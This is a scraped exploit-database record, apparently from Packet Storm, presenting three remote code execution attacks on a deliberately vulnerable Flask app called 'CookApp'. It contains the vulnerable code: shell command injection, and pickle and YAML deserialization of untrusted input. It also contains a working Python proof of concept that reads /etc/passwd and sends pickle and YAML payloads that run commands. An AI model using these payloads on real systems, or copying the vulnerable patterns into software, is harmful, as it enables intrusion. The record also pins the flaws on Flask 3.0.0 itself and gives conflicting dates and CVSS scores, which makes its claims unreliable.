{“lastseen”:”2025-12-05T18:52:32″,”description”:”Flask version 3.0.0 suffers from multiple remote code execution vulnerabilities…”,”published”:”2025-12-05T00:00:00″,”modified”:”2025-12-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Flask 3.0.0 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212501″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-55182″],”sourceData”:”# Exploit Title: Flask 3.0.0 CookApp – Multiple Unauthenticated RCE\\n Vulnerabilities\\n # Date: 2024-12-05\\n # Exploit Author: nu11secur1ty\\n # Vendor Homepage: https:\/\/flask.palletsprojects.com\/\\n # Software Link: https:\/\/pypi.org\/project\/Flask\/\\n # Version: 3.0.0\\n # Tested on: Linux (Ubuntu 22.04), Docker containers\\n # CVE: CVE-2025-55182\\n # Category: Remote Code Execution\\n # Platform: Python\/Flask\\n \\n 1. Description\\n ==============\\n \\n A vulnerable Flask application (CookApp) contains multiple critical security\\n vulnerabilities that allow unauthenticated remote attackers to execute arbitrary\\n commands on the target system.\\n \\n The application contains three distinct Remote Code Execution (RCE) vectors:\\n \\n 1. Command Injection via `\/api\/run` endpoint (CWE-78)\\n 2. Pickle Deserialization RCE via `\/api\/load` endpoint (CWE-502)\\n 3. YAML Deserialization RCE via `\/api\/yaml` endpoint (CWE-502)\\n \\n CVSS 3.1 Score: 9.8 (CRITICAL)\\n Vector: CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H\\n \\n 2. Vulnerable Code\\n ==================\\n \\n “`python\\n # Vulnerable endpoint 1: Command Injection\\n @app.route(\\”\/api\/run\\”, methods=[\\”POST\\”])\\n def run_cmd():\\n cmd = request.json.get(\\”cmd\\”, \\”whoami\\”)\\n # VULNERABLE: shell=True with user input\\n output = subprocess.check_output(cmd, shell=True)\\n return {\\”output\\”: output.decode()}\\n \\n # Vulnerable endpoint 2: Pickle Deserialization\\n @app.route(\\”\/api\/load\\”, methods=[\\”POST\\”])\\n def load():\\n data = request.get_data()\\n # VULNERABLE: pickle.loads() with untrusted data\\n recipe = pickle.loads(data)\\n return {\\”status\\”: \\”loaded\\”, \\”recipe\\”: str(recipe)}\\n \\n # Vulnerable endpoint 3: YAML Deserialization\\n @app.route(\\”\/api\/yaml\\”, methods=[\\”POST\\”])\\n def import_yaml():\\n yaml_data = request.data.decode()\\n # VULNERABLE: yaml.load() instead of yaml.safe_load()\\n data = yaml.load(yaml_data, Loader=yaml.Loader)\\n return {\\”data\\”: str(data)}\\n \\n [+]PoC:\\n \\n “`py\\n \\n #!\/usr\/bin\/env python3\\n # https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/blob\/main\/2025\/flask-3.0.0-RCE\/PoC.py\\n # nu11secur1ty\\n import requests\\n import pickle\\n \\n target = \\”http:\/\/vulnerable-host:5000\\”\\n \\n # 1. Command Injection (simplest)\\n resp = requests.post(f\\”{target}\/api\/run\\”, json={\\”cmd\\”: \\”cat \/etc\/passwd\\”})\\n print(\\”Command Injection Output:\\”, resp.json().get(‘output’, ”))\\n \\n # 2. Pickle RCE\\n class RCE:\\n def __reduce__(self):\\n import os\\n return (os.system, (\\”id\\”,))\\n \\n payload = pickle.dumps(RCE())\\n resp = requests.post(f\\”{target}\/api\/load\\”, data=payload)\\n print(\\”Pickle RCE Status:\\”, resp.status_code)\\n \\n # 3. YAML RCE\\n yaml_payload = \\”\\”\\”!!python\/object\/apply:subprocess.Popen\\n – [\\”sh\\”, \\”-c\\”, \\”whoami\\”]\\”\\”\\”\\n resp = requests.post(f\\”{target}\/api\/yaml\\”, data=yaml_payload)\\n print(\\”YAML RCE Status:\\”, resp.status_code)\\n “`\\n ### Demo:\\n [href](https:\/\/www.patreon.com\/posts\/flask-3-0-0-rce-145134394)\\n \\n \\n — \\n \\n System Administrator – Infrastructure Engineer\\n Penetration Testing Engineer\\n Exploit developer at https:\/\/packetstorm.news\/\\n https:\/\/cve.mitre.org\/index.html\\n https:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\n 0day Exploit DataBase https:\/\/0day.today\/\\n home page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\n hiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\n nu11secur1ty \\u003chttp:\/\/nu11secur1ty.com\/\\u003e”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212501″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212501\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-05T18:52:32″,”description”:”Flask version 3.0.0 suffers from multiple remote code execution vulnerabilities…”,”published”:”2025-12-05T00:00:00″,”modified”:”2025-12-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Flask 3.0.0 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212501″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-55182″],”sourceData”:”# Exploit Title: Flask 3.0.0 CookApp – Multiple Unauthenticated RCE\\n Vulnerabilities\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-28898","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n